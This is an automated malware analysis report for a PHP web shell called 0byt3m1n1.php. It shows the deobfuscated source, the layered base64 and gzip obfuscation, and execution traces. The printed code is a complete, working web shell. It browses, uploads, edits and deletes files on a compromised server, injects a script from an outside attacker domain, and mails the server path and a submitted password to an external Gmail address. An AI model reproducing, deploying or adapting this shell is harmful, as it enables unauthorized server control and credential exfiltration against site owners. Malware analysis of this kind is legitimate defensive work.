PHP Malware Analysis
0byt3m1n1.php
md5: 84da2a9349c3934fe8fd592194002053
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- voscode777@gmail.com (Deobfuscated, Traces)
Encoding
Environment
- error_reporting (Deobfuscated, Traces)
- getcwd (Deobfuscated, Traces)
- set_time_limit (Deobfuscated, Traces)
Execution
Files
- copy (Deobfuscated, Traces)
- file_get_contents (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _GET (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
Title
- 0byt3m1n1 (Deobfuscated, HTML)
URLs
- http://w0rms.com/kaydet.php (Deobfuscated, HTML, Traces)
- http://zerobyte.id/ (Deobfuscated, HTML, Traces)
- https://fonts.googleapis.com/css?family=VT323 (Deobfuscated, HTML, Traces)
Deobfuscated PHP code
<?php
$enc = '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';
eval /* PHPDeobfuscator eval output */ {
echo "<script src=http://w0rms.com/kaydet.php></script>";
set_time_limit(0);
error_reporting(0);
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
?>
<!DOCTYPE html><html><head><link href="" rel="stylesheet" type="text/css"><title>0byt3m1n1</title>
<link href='https://fonts.googleapis.com/css?family=VT323' rel='stylesheet'>
<style type="text/css">body{background: #263238;color:#eceff1;font-family:'Courier';margin:0;font-size: 14px;}h1{font-family:'VT323';font-weight:normal;font-size:60px;margin:0;}h1:hover{color:#ffee58;}select{background:#ef6c00;color:#eceff1;}a{color:#ef6c00;text-decoration:none;font-family:'Courier'}textarea{width:900px;height:250px;background:transparent;border:1px dashed #ef6c00;color:#ef6c00;padding:2px;}tr.first{border-bottom:1px dashed #ef6c00;}tr:hover{background: #7f2e00;}th{background: #ef6c00;padding:5px;}</style>
</head><body> <?php
echo "<div style=\"color:#ef6c00;margin-top:0;\"><h1><center>0byt3m1n1</center></h1></div>";
if (isset($_GET['path'])) {
$path = $_GET['path'];
chdir($_GET['path']);
} else {
$path = getcwd();
}
$path = str_replace("\\", "/", $path);
$paths = explode("/", $path);
echo "<table width=\"100%\" border=\"0\" align=\"center\" style=\"margin-top:-10px;\"><tr><td>";
echo "<font style='font-size:13px;'>Path: ";
foreach ($paths as $id => $pat) {
echo "<a style='font-size:13px;' href='?path=";
for ($i = 0; $i <= $id; $i++) {
echo $paths[$i];
if ($i != $id) {
echo "/";
}
}
echo "'>{$pat}</a>/";
}
echo "<br>[ <a href=\"?\">Home</a> ]</font></td><td align=\"center\" width=\"27%\"><form enctype=\"multipart/form-data\" method=\"POST\"><input type=\"file\" name=\"file\" style=\"color:#ef6c00;margin-bottom:4px;\"/>\r\n<input type=\"submit\" value=\"Upload\" /></form></td></tr><tr><td colspan=\"2\">";
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo "<center><font color=\"#00ff00\">Upload OK!.</font></center><br/>";
} else {
echo "<center><font color=\"red\">Upload Failed!.</font></center><br/>";
}
}
echo "</td></tr><tr><td></table>";
if (isset($_GET['filesrc'])) {
echo "<table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr><td>File: ";
echo "" . basename($_GET['filesrc']);
"";
echo "</tr></td></table><br />";
echo "<center><textarea readonly=''>" . htmlspecialchars(file_get_contents($_GET['filesrc'])) . "</textarea></center>";
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
if ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo "<center><font color=\"#00ff00\">Rename OK!</font></center><br />";
} else {
echo "<center><font color=\"red\">Rename Failed!</font></center><br />";
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo "<center><font color=\"#00ff00\">Edit File OK!.</font></center><br />";
} else {
echo "<center><font color=\"red\">Edit File Failed!.</font></center><br />";
}
fclose($fp);
}
echo '<form method="POST"><textarea cols=80 rows=20 name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br /><input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="edit"><input type="submit" value="Go" /></form>';
}
echo "</center>";
} else {
echo "</table><br /><center>";
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo "<center><font color=\"#00ff00\">Dir Deleted!</font></center><br />";
} else {
echo "<center><font color=\"red\">Delete Dir Failed!</font></center><br />";
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo "<font color=\"#00ff00\">Delete File Done.</font><br />";
} else {
echo "<font color=\"red\">Delete File Error.</font><br />";
}
}
}
echo "</center>";
$scandir = scandir($path);
echo "<div id=\"content\"><table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr class=\"first\">\r\n<th><center>Name</center></th><th width=\"12%\"><center>Size</center></th><th width=\"10%\"><center>Permissions</center></th>\r\n<th width=\"15%\"><center>Last Update</center></th><th width=\"11%\"><center>Options</center></th></tr>";
foreach ($scandir as $dir) {
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "<tr><td>[D] <a href=\"?path={$path}/{$dir}\">{$dir}</a></td><td><center>--</center></td><td><center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"#00ff00\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$dir}")) . "";
echo "</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path={$path}\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option></select><input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"{$dir}\"><input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>";
}
foreach ($scandir as $file) {
if (!is_file("{$path}/{$file}")) {
continue;
}
$size = filesize("{$path}/{$file}") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size .= ' KB';
}
echo "<tr><td>[F] <a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td><td><center>" . $size . "</center></td><td><center>";
if (is_writable("{$path}/{$file}")) {
echo "<font color=\"#00ff00\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$file}")) . "";
echo "</center></td><td><center><form method=\"POST\" action=\"?option&path={$path}\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option><option value=\"edit\">Edit</option></select><input type=\"hidden\" name=\"type\" value=\"file\"><input type=\"hidden\" name=\"name\" value=\"{$file}\"><input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>";
}
echo "</table></div>";
}
echo "</body></html>";
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xc000) == 0xc000) {
$info = 's';
} elseif (($perms & 0xa000) == 0xa000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= $perms & 0x100 ? 'r' : '-';
$info .= $perms & 0x80 ? 'w' : '-';
$info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
$info .= $perms & 0x20 ? 'r' : '-';
$info .= $perms & 0x10 ? 'w' : '-';
$info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
$info .= $perms & 0x4 ? 'r' : '-';
$info .= $perms & 0x2 ? 'w' : '-';
$info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return $info;
}
echo "<br><center>© 2017 - <a href=\"http://zerobyte.id/\">ZeroByte.ID</a> Recoded from Kodong.</center><br>";
$tmp = $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "\n" . $_POST['pass'];
@mail("voscode777@gmail.com", 'root', $tmp);
// Edit or delete!
};
exit;Execution traces
data/traces/84da2a9349c3934fe8fd592194002053_trace-1676260505.7025.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:55:31.600290]
1 0 1 0.000141 393528
1 3 0 0.000197 398096 {main} 1 /var/www/html/uploads/0byt3m1n1.php 0 0
1 A /var/www/html/uploads/0byt3m1n1.php 2 $enc = 'JD+O2gW3Yo7G/TzvEm3jqFCKieC5BZII1IKjR0ugFJhaPsGa0+caPbvf+6JLj7Pnqk/g/f2CPXe87Fd/++SBRD7xKJOYwnfA4vJscFwzI3QXUKNOfsESxJNDZ0d+h78bnPOFqvbK9LP85/j+Z6ynn++00n/9IxfsEMUSw8ymlvzrKczIvBCKSy8lyRuTizXO/GZP+9tC2D/nRD9aeuTw7MNReeT872fBnKe7n4D7Pj0DQ+DB/zAZj8DkaIDRVkgIFL8cRUEyZy8ciBEd3Hz+dz8a3OrZxgNPZ/odPgZ/wz3xu/oNj1V3Mv2thyO25wZ+X8q/Lg0y9lqUuJNPdgVKDEcXzjXJj0MBbYAtsds0wY5EfoqLMbpqxad9xAst2w34iP7EmerTFqLdbiT6rOdoe1pJurjaOQHK5ItbZONWzFaYOP5eOp5odqgj0tJ+pzKvonVeXzFy+n5SqEoFwxrNctnIhHObT30r3iJh93TTaKEnDwzpJaa+N4UTs1AZZJEL'
2 4 0 0.000243 398096 base64_decode 0 /var/www/html/uploads/0byt3m1n1.php 3 1 'WlhaaGJDZ2lQejRpTG1kNmRXNWpiMjF3Y21WemN5aG5lblZ1WTI5dGNISmxjM01vWjNwcGJtWnNZWFJsS0dkNmFXNW1iR0YwWlNobmVtbHVabXhoZEdVb1ltRnpaVFkwWDJSbFkyOWtaU2h6ZEhKeVpYWW9KR1Z1WXlrcEtTa3BLU2twT3c9PQ========='
2 4 1 0.000265 398352
2 4 R 'ZXZhbCgiPz4iLmd6dW5jb21wcmVzcyhnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGd6aW5mbGF0ZShnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJGVuYykpKSkpKSkpOw=='
2 5 0 0.000288 398320 base64_decode 0 /var/www/html/uploads/0byt3m1n1.php 3 1 'ZXZhbCgiPz4iLmd6dW5jb21wcmVzcyhnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGd6aW5mbGF0ZShnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJGVuYykpKSkpKSkpOw=='
2 5 1 0.000308 398544
2 5 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($enc))))))));'
2 6 0 0.000338 400632 eval 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($enc))))))));' /var/www/html/uploads/0byt3m1n1.php 3 0
3 7 0 0.000356 400632 strrev 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code 1 1 'JD+O2gW3Yo7G/TzvEm3jqFCKieC5BZII1IKjR0ugFJhaPsGa0+caPbvf+6JLj7Pnqk/g/f2CPXe87Fd/++SBRD7xKJOYwnfA4vJscFwzI3QXUKNOfsESxJNDZ0d+h78bnPOFqvbK9LP85/j+Z6ynn++00n/9IxfsEMUSw8ymlvzrKczIvBCKSy8lyRuTizXO/GZP+9tC2D/nRD9aeuTw7MNReeT872fBnKe7n4D7Pj0DQ+DB/zAZj8DkaIDRVkgIFL8cRUEyZy8ciBEd3Hz+dz8a3OrZxgNPZ/odPgZ/wz3xu/oNj1V3Mv2thyO25wZ+X8q/Lg0y9lqUuJNPdgVKDEcXzjXJj0MBbYAtsds0wY5EfoqLMbpqxad9xAst2w34iP7EmerTFqLdbiT6rOdoe1pJurjaOQHK5ItbZONWzFaYOP5eOp5odqgj0tJ+pzKvonVeXzFy+n5SqEoFwxrNctnIhHObT30r3iJh93TTaKEnDwzpJaa+N4UTs1AZZJEL'
3 7 1 0.000383 404760
3 7 R 'AdwJI/YB1wko9gHSCS32eJwBxwk49nic1Vnbcts4En1PVf4BQTSBVLFESnYcRxLlSWJ7MpWbK/HM1ozlUlEkZHHD25JQbEejf99uALxaUjSb3Yd9sUmgb+g+fQBQw+N4Hj98wJ15RNgwdRIvFiRNHGsuRNw3jBszCdKOEwXGF/vO5aID4qOhoQRHbPDwQcrFRHgBn/he4Imm2YIxniRRMkl4HCXCC6/VoDdrXoNsYF97zuRfi0jwdHIdO81WazmLEm4782Zjcv7x8wWxU9L4wu+sUeOr7S94a6nGL3HwilgkFeA99e10ztOmlhmsVg8fHI8ePhg+Ovn4+uKP81MyF4E/Guq/3HZHQ98Lv5B5wmcWpSThvkVTcedzsMMFJeIu5hYV/FYYTprS0VB4wucjc3on9oNu2B0aagB8FIYYJiqFTM2iUKSd6yi69rkdeyppYOd4Zgeef2f9frHf22fSKyu8MrQmX++5n0bu3XJqO1+uk2gRun3yuHcIJo4GTuRH'
3 8 0 0.000412 404728 base64_decode 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code 1 1 'AdwJI/YB1wko9gHSCS32eJwBxwk49nic1Vnbcts4En1PVf4BQTSBVLFESnYcRxLlSWJ7MpWbK/HM1ozlUlEkZHHD25JQbEejf99uALxaUjSb3Yd9sUmgb+g+fQBQw+N4Hj98wJ15RNgwdRIvFiRNHGsuRNw3jBszCdKOEwXGF/vO5aID4qOhoQRHbPDwQcrFRHgBn/he4Imm2YIxniRRMkl4HCXCC6/VoDdrXoNsYF97zuRfi0jwdHIdO81WazmLEm4782Zjcv7x8wWxU9L4wu+sUeOr7S94a6nGL3HwilgkFeA99e10ztOmlhmsVg8fHI8ePhg+Ovn4+uKP81MyF4E/Guq/3HZHQ98Lv5B5wmcWpSThvkVTcedzsMMFJeIu5hYV/FYYTprS0VB4wucjc3on9oNu2B0aagB8FIYYJiqFTM2iUKSd6yi69rkdeyppYOd4Zgeef2f9frHf22fSKyu8MrQmX++5n0bu3XJqO1+uk2gRun3yuHcIJo4GTuRH'
3 8 1 0.000446 408856
3 8 R '\001�\t#�\001�\t(�\001�\t-�x�\001�\t8�x��Y�r�8\022}OU�\001A4�T�DJv\034G\022�Ib{2��+���RQ$dq�ےPlG��n\000�ZR4�݇}�I�o�>}\000P��x\036?|��yD�0u\022/\026$M\034k.D�7�\0333\tҎ\023\005�\027���\003⣡�\004Gl��A��Dx\001��^�ق1�$Q2Ix\034%�\v�ՠ7k^�l`_{��_�H�tr\035;�Vk9�\022n;�fcr���\005�S���Q��/xk��/q�X$\025�=��t�Ӧ�\031�V\017\037\034�\036>\030>:�����S2\027�?\032��vGC�\v��y�g\026�$�ESq�s��\005%�.�\026\025�V\030N���Px��#sz\'��n�\035\032j\000|\024�\030&*�L͢P���(���\035{*i`�xf\a�g�~���g�++�2�&_﹟F��rj;_'
3 9 0 0.000536 404728 gzinflate 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code 1 1 '\001�\t#�\001�\t(�\001�\t-�x�\001�\t8�x��Y�r�8\022}OU�\001A4�T�DJv\034G\022�Ib{2��+���RQ$dq�ےPlG��n\000�ZR4�݇}�I�o�>}\000P��x\036?|��yD�0u\022/\026$M\034k.D�7�\0333\tҎ\023\005�\027���\003⣡�\004Gl��A��Dx\001��^�ق1�$Q2Ix\034%�\v�ՠ7k^�l`_{��_�H�tr\035;�Vk9�\022n;�fcr���\005�S���Q��/xk��/q�X$\025�=��t�Ӧ�\031�V\017\037\034�\036>\030>:�����S2\027�?\032��vGC�\v��y�g\026�$�ESq�s��\005%�.�\026\025�V\030N���Px��#sz\'��n�\035\032j\000|\024�\030&*�L͢P���(���\035{*i`�xf\a�g�~���g�++�2�&_﹟F��rj;_'
3 9 1 0.000624 407320
3 9 R '\001�\t(�\001�\t-�x�\001�\t8�x��Y�r�8\022}OU�\001A4�T�DJv\034G\022�Ib{2��+���RQ$dq�ےPlG��n\000�ZR4�݇}�I�o�>}\000P��x\036?|��yD�0u\022/\026$M\034k.D�7�\0333\tҎ\023\005�\027���\003⣡�\004Gl��A��Dx\001��^�ق1�$Q2Ix\034%�\v�ՠ7k^�l`_{��_�H�tr\035;�Vk9�\022n;�fcr���\005�S���Q��/xk��/q�X$\025�=��t�Ӧ�\031�V\017\037\034�\036>\030>:�����S2\027�?\032��vGC�\v��y�g\026�$�ESq�s��\005%�.�\026\025�V\030N���Px��#sz\'��n�\035\032j\000|\024�\030&*�L͢P���(���\035{*i`�xf\a�g�~���g�++�2�&_﹟F��rj;_��h\021�}'
3 10 0 0.000717 403192 gzinflate 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code 1 1 '\001�\t(�\001�\t-�x�\001�\t8�x��Y�r�8\022}OU�\001A4�T�DJv\034G\022�Ib{2��+���RQ$dq�ےPlG��n\000�ZR4�݇}�I�o�>}\000P��x\036?|��yD�0u\022/\026$M\034k.D�7�\0333\tҎ\023\005�\027���\003⣡�\004Gl��A��Dx\001��^�ق1�$Q2Ix\034%�\v�ՠ7k^�l`_{��_�H�tr\035;�Vk9�\022n;�fcr���\005�S���Q��/xk��/q�X$\025�=��t�Ӧ�\031�V\017\037\034�\036>\030>:�����S2\027�?\032��vGC�\v��y�g\026�$�ESq�s��\005%�.�\026\025�V\030N���Px��#sz\'��n�\035\032j\000|\024�\030&*�L͢P���(���\035{*i`�xf\a�g�~���g�++�2�&_﹟F��rj;_��h\021�}'
3 10 1 0.000802 405784
3 10 R '\001�\t-�x�\001�\t8�x��Y�r�8\022}OU�\001A4�T�DJv\034G\022�Ib{2��+���RQ$dq�ےPlG��n\000�ZR4�݇}�I�o�>}\000P��x\036?|��yD�0u\022/\026$M\034k.D�7�\0333\tҎ\023\005�\027���\003⣡�\004Gl��A��Dx\001��^�ق1�$Q2Ix\034%�\v�ՠ7k^�l`_{��_�H�tr\035;�Vk9�\022n;�fcr���\005�S���Q��/xk��/q�X$\025�=��t�Ӧ�\031�V\017\037\034�\036>\030>:�����S2\027�?\032��vGC�\v��y�g\026�$�ESq�s��\005%�.�\026\025�V\030N���Px��#sz\'��n�\035\032j\000|\024�\030&*�L͢P���(���\035{*i`�xf\a�g�~���g�++�2�&_﹟F��rj;_��h\021�}�w\b&�\0'
3 11 0 0.000888 403192 gzinflate 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code 1 1 '\001�\t-�x�\001�\t8�x��Y�r�8\022}OU�\001A4�T�DJv\034G\022�Ib{2��+���RQ$dq�ےPlG��n\000�ZR4�݇}�I�o�>}\000P��x\036?|��yD�0u\022/\026$M\034k.D�7�\0333\tҎ\023\005�\027���\003⣡�\004Gl��A��Dx\001��^�ق1�$Q2Ix\034%�\v�ՠ7k^�l`_{��_�H�tr\035;�Vk9�\022n;�fcr���\005�S���Q��/xk��/q�X$\025�=��t�Ӧ�\031�V\017\037\034�\036>\030>:�����S2\027�?\032��vGC�\v��y�g\026�$�ESq�s��\005%�.�\026\025�V\030N���Px��#sz\'��n�\035\032j\000|\024�\030&*�L͢P���(���\035{*i`�xf\a�g�~���g�++�2�&_﹟F��rj;_��h\021�}�w\b&�\0'
3 11 1 0.000971 405784
3 11 R 'x�\001�\t8�x��Y�r�8\022}OU�\001A4�T�DJv\034G\022�Ib{2��+���RQ$dq�ےPlG��n\000�ZR4�݇}�I�o�>}\000P��x\036?|��yD�0u\022/\026$M\034k.D�7�\0333\tҎ\023\005�\027���\003⣡�\004Gl��A��Dx\001��^�ق1�$Q2Ix\034%�\v�ՠ7k^�l`_{��_�H�tr\035;�Vk9�\022n;�fcr���\005�S���Q��/xk��/q�X$\025�=��t�Ӧ�\031�V\017\037\034�\036>\030>:�����S2\027�?\032��vGC�\v��y�g\026�$�ESq�s��\005%�.�\026\025�V\030N���Px��#sz\'��n�\035\032j\000|\024�\030&*�L͢P���(���\035{*i`�xf\a�g�~���g�++�2�&_﹟F��rj;_��h\021�}�w\b&�\006N�GI�1w'
3 12 0 0.001058 403192 gzuncompress 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code 1 1 'x�\001�\t8�x��Y�r�8\022}OU�\001A4�T�DJv\034G\022�Ib{2��+���RQ$dq�ےPlG��n\000�ZR4�݇}�I�o�>}\000P��x\036?|��yD�0u\022/\026$M\034k.D�7�\0333\tҎ\023\005�\027���\003⣡�\004Gl��A��Dx\001��^�ق1�$Q2Ix\034%�\v�ՠ7k^�l`_{��_�H�tr\035;�Vk9�\022n;�fcr���\005�S���Q��/xk��/q�X$\025�=��t�Ӧ�\031�V\017\037\034�\036>\030>:�����S2\027�?\032��vGC�\v��y�g\026�$�ESq�s��\005%�.�\026\025�V\030N���Px��#sz\'��n�\035\032j\000|\024�\030&*�L͢P���(���\035{*i`�xf\a�g�~���g�++�2�&_﹟F��rj;_��h\021�}�w\b&�\006N�GI�1w'
3 12 1 0.001142 405784
3 12 R 'x��Y�r�8\022}OU�\001A4�T�DJv\034G\022�Ib{2��+���RQ$dq�ےPlG��n\000�ZR4�݇}�I�o�>}\000P��x\036?|��yD�0u\022/\026$M\034k.D�7�\0333\tҎ\023\005�\027���\003⣡�\004Gl��A��Dx\001��^�ق1�$Q2Ix\034%�\v�ՠ7k^�l`_{��_�H�tr\035;�Vk9�\022n;�fcr���\005�S���Q��/xk��/q�X$\025�=��t�Ӧ�\031�V\017\037\034�\036>\030>:�����S2\027�?\032��vGC�\v��y�g\026�$�ESq�s��\005%�.�\026\025�V\030N���Px��#sz\'��n�\035\032j\000|\024�\030&*�L͢P���(���\035{*i`�xf\a�g�~���g�++�2�&_﹟F��rj;_��h\021�}�w\b&�\006N�GI�1w�l�\035�߶�'
